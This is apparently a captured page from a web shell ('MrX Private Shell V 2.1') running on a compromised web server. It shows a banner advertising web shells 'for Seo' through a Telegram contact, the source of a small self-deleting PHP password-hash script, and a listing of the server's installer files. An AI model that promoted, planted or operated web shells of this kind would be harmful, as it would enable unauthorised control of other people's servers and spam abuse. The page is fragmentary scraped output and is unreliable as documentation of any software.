__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
if(function_exists('password_hash')){
$resp = password_hash('[[admin_pass]]', PASSWORD_DEFAULT);
echo '<update_pass>'.$resp.'</update_pass>';
}else{
$salt = uniqid();
if(function_exists("mcrypt_create_iv")) {
$salt = base64_encode(mcrypt_create_iv(24, MCRYPT_DEV_URANDOM));
}
if (CRYPT_SHA256 == 1) {
$salt = '$5$'.$salt;
}
$resp = crypt('[[admin_pass]]', $salt);
echo '<update_pass>'.$resp.'</update_pass>';
}
@unlink('update_pass.php');
?>| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| images | Folder | 0755 |
|
|
| php53 | Folder | 0755 |
|
|
| php56 | Folder | 0755 |
|
|
| php71 | Folder | 0755 |
|
|
| php81 | Folder | 0755 |
|
|
| php82 | Folder | 0755 |
|
|
| NOTES.txt | File | 608 B | 0644 |
|
| changelog.txt | File | 1.93 KB | 0644 |
|
| clone.php | File | 5.65 KB | 0644 |
|
| edit.php | File | 6.54 KB | 0644 |
|
| edit.xml | File | 433 B | 0644 |
|
| fileindex.php | File | 271 B | 0644 |
|
| import.php | File | 3.84 KB | 0644 |
|
| info.xml | File | 3.85 KB | 0644 |
|
| install.js | File | 924 B | 0644 |
|
| install.php | File | 9.65 KB | 0644 |
|
| install.xml | File | 1.86 KB | 0644 |
|
| md5 | File | 9.77 KB | 0644 |
|
| update_pass.php | File | 470 B | 0644 |
|
| upgrade.php | File | 3.46 KB | 0644 |
|
| upgrade.xml | File | 346 B | 0644 |
|